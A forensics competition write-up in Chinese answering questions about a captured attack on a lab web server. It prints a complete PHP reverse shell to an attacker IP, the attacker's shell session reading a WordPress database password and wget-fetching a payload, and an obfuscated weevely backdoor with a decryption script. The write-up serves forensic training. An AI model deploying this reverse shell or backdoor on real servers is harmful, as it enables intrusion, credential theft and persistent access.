Last-Modified: Wed, 31 Jul 2024 06:43:54 GMT

<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.75.132';
$port = 30127;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?> 

192.168.75.132:30127

12.分析网络流量包检材,攻击者电脑所使用的Python版本号是?(答案格式:1.1.1) (2分)

HTTP的头信息中可知攻击者电脑所使用的Python版本号是3.11.8

Server: SimpleHTTP/0.6 Python/3.11.8

3.11.8

13.分析网络流量包检材,受害者服务器中网站所使用的框架结构是?(答案格式:thinkphp) (2分)

由第11题可知攻击者反弹shell的端口是30127,反弹shell是tcp协议,使用命令

not http and tcp.flags.push==1 and tcp.port==30127

image-20241126193733299

image-20241126193746178
Linux zico 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
 14:44:32 up 35 min,  0 users,  load average: 0.01, 0.04, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
pwd

/
$ 
ls

bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
selinux
srv
sys
tmp
usr
vagrant
var
vmlinuz
$ 
ls /home

zico
$ 
cd /home/zico

$ 
ls

bootstrap.zip
joomla
startbootstrap-business-casual-gh-pages
to_do.txt
wordpress
wordpress-4.8.zip
zico-history.tar.gz
$ 
ls -lh

total 9.0M
-rw-rw-r--  1 zico zico 493K Jun 14  2017 bootstrap.zip
drwxrwxr-x 18 zico zico 4.0K Jun 19  2017 joomla
drwxrwxr-x  6 zico zico 4.0K Aug 19  2016 startbootstrap-business-casual-gh-pages
-rw-rw-r--  1 zico zico   61 Jun 19  2017 to_do.txt
drwxr-xr-x  5 zico zico 4.0K Jun 19  2017 wordpress
-rw-rw-r--  1 zico zico 8.5M Jun 19  2017 wordpress-4.8.zip
-rw-rw-r--  1 zico zico 1.2K Jun  8  2017 zico-history.tar.gz
$ 
cat to_do.txt


try list:
- joomla
- bootstrap (+phpliteadmin)
- wordpress

$ 
cat wordpress

cat: wordpress: Is a directory
$ 
cd wordpress

$ 
ls

index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
$ 
cat wp-config.php

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');

/** MySQL database username */
define('DB_USER', 'zico');

/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');

/** MySQL hostname */
define('DB_HOST', 'zico');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
$ 
ls

index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
$ 
cat wp-config.php |grep password

/** MySQL database password */
$ 
cat wp-config.php |grep -i pass

/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
$ 
ls /var/www

LICENSE
README.md
css
dbadmin
gulpfile.js
img
index.html
js
less
package.json
tools.html
vendor
view.php
$ 
cd /var/www

$ 
ls -lh

total 64K
-rwxrwxrwx 1 root root 1.1K Jun  8  2017 LICENSE
-rwxrwxrwx 1 root root 1.5K Jun  8  2017 README.md
drwxrwxrwx 2 root root 4.0K Jun  8  2017 css
drwxrwxrwx 2 root root 4.0K Jun  8  2017 dbadmin
-rwxrwxrwx 1 root root 3.1K Jun  8  2017 gulpfile.js
drwxrwxrwx 3 root root 4.0K Jun  8  2017 img
-rwxrwxrwx 1 root root 7.8K Jun  8  2017 index.html
drwxrwxrwx 2 root root 4.0K Jun  8  2017 js
drwxrwxrwx 2 root root 4.0K Jun  8  2017 less
-rwxrwxrwx 1 root root  789 Jun  8  2017 package.json
-rwxrwxrwx 1 root root 8.2K Jun  8  2017 tools.html
drwxrwxrwx 7 root root 4.0K Jun  8  2017 vendor
-rwxrwxrwx 1 root root   61 Jun  8  2017 view.php
$ 
wget 192.168.75.132:2000/help.php

--2024-07-31 15:03:35--  http://192.168.75.132:2000/help.php
Connecting to 192.168.75.132:2000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 771 [application/octet-stream]
help.php: Permission denied

Cannot write to `help.php' (Permission denied).
$ 
id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 
ls

LICENSE
README.md
css
dbadmin
gulpfile.js
img
index.html
js
less
package.json
tools.html
vendor
view.php
$ 
ls -lh

total 64K
-rwxrwxrwx 1 root root 1.1K Jun  8  2017 LICENSE
-rwxrwxrwx 1 root root 1.5K Jun  8  2017 README.md
drwxrwxrwx 2 root root 4.0K Jun  8  2017 css
drwxrwxrwx 2 root root 4.0K Jun  8  2017 dbadmin
-rwxrwxrwx 1 root root 3.1K Jun  8  2017 gulpfile.js
drwxrwxrwx 3 root root 4.0K Jun  8  2017 img
-rwxrwxrwx 1 root root 7.8K Jun  8  2017 index.html
drwxrwxrwx 2 root root 4.0K Jun  8  2017 js
drwxrwxrwx 2 root root 4.0K Jun  8  2017 less
-rwxrwxrwx 1 root root  789 Jun  8  2017 package.json
-rwxrwxrwx 1 root root 8.2K Jun  8  2017 tools.html
drwxrwxrwx 7 root root 4.0K Jun  8  2017 vendor
-rwxrwxrwx 1 root root   61 Jun  8  2017 view.php
$ 

wordpress

14.分析网络流量包检材,攻击者获取到的数据库密码是?(答案格式:大小写按实际值填写) (4分)

sWfCsfJSPV9H3AmQzw8

15.分析网络流量包检材,攻击上传了一个weevely木马进行权限维持,上传时所使用的端口号为?(答案格式:3306) (2分)

在追踪的TCP流中可知上传的weevely木马是help.php,使用的端口号为2000

2000

16.分析网络流量包检材,攻击者上传了一个weevely木马进行权限维持,该木马第一次执行时获取到的缓冲区内容是?(答案格式:按实际值填写) (4分)

由上题可知攻击者上传的weevely木马文件名称为help.php,Ctrl+F打开搜索按钮,在分组列表中搜索help.php,右键追踪HTTP流,可得到加解密代码

image-20241126194034511

GET /help.php HTTP/1.1
User-Agent: Wget/1.13.4 (linux-gnu)
Accept: */*
Host: 192.168.75.132:2000
Connection: Keep-Alive


HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.11.8
Date: Wed, 31 Jul 2024 07:03:35 GMT
Content-type: application/octet-stream
Content-Length: 771
Last-Modified: Wed, 31 Jul 2024 07:00:33 GMT

<?php
$q='uv1o2g6mkn7y";fv1unctiv1ov1n x(v1$t,$k){$c=v1strlen(v1$k)v1;v1$l=strlenv1($t);$o';
$k='tents(v1"php://iv1nput"),$v1mv1)==1) {@ov1b_start();v1@ev1val(@v1gzuncomv1press(@x(@';
$A='$k="c6v1ae1ev170";$khv1="cbbf9v1691e009";v1$v1kv1f="85a8v19e92c410";$p="dv1zINv1Rg';
$o='="v1";forv1($i=0;$v1iv1v1<$l;){fv1v1or($j=0;($j<$c&&$i<$lv1);$j++,$i++)v1{v1$o.=v1$t{$i}^';
$D=str_replace('cM','','cMcreacMte_cMfcMunccMcMtion');
$Q='$k{$j}v1v1;}}return v1$o;v1}if (@pregv1_v1match("/v1$kh(.+)v1v1$kf/",@v1fv1ile_get_cov1n';
$Z='leanv1();$r=@base6v14_ev1ncv1ode(v1@x(@gzcov1mpress($ov1),$v1kv1));printv1("$p$kh$r$kf");}';
$w='v1basev164_decodev1($mv1[v11]),$v1k)));$o=@ov1b_get_contev1nts(v1v1);@ob_env1d_c';
$S=str_replace('v1','',$A.$q.$o.$Q.$k.$w.$Z);
$C=$D('',$S);$C();
?>

查找第一个向help.php发送POST请求的数据包,追踪该数据包

image-20241126194331964

追踪第一个

image-20241126194352982

使用去除混肴后的php脚本解密数据包

<?php
$k = "c6ae1e70";
$kh = "cbbf9691e009";
$kf = "85a89e92c410";
$p = "dzINRguo2g6mkn7y";

// 输入的加密字符串
$encrypted_string = "dzINRguo2g6mkn7ycbbf9691e009G6pSUAZWgTBjNUtkPw==85a89e92c410";
// 提取密文部分
$pattern = "/$kh(.+)$kf/";
preg_match($pattern, $encrypted_string, $matches);
if (isset($matches[1])) {
    $encrypted_data = $matches[1];
    // Base64 解码
    $decoded_data = base64_decode($encrypted_data);
    // 解密
    function x($t, $k) {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        for ($i = 0; $i < $l;) {
            for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    $decrypted_data = x($decoded_data, $k);
    // Gzip 解压
    $uncompressed_data = gzuncompress($decrypted_data);
    // 输出解密后的结果
    echo $uncompressed_data;
} else {
    echo "No match found.";
}
?>
posted @ 2026-05-25 16:45  Cava1i  阅读(25)  评论(0)    收藏  举报